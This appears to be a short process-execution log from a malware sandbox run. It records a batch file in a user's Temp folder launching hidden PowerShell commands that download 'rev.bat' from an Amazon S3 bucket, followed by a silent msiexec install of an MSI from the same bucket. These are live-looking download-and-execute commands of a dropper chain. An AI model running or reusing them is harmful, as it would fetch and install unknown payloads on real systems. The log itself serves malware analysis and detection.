cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "buJBomkvuli" C:\Users\test22\AppData\Local\Temp\SysdiagHelp.bat
3012powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://fesad.s3.eu-north-1.amazonaws.com/rev.bat -OutFile C:\ProgramData\rev.bat"
1368powershell.exe powershell -WindowStyle Hidden -Command "Start-Sleep -Seconds 15"
2384msiexec.exe msiexec.exe /i https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi /qn
1704explorer.exe C:\Windows\Explorer.EXE
1236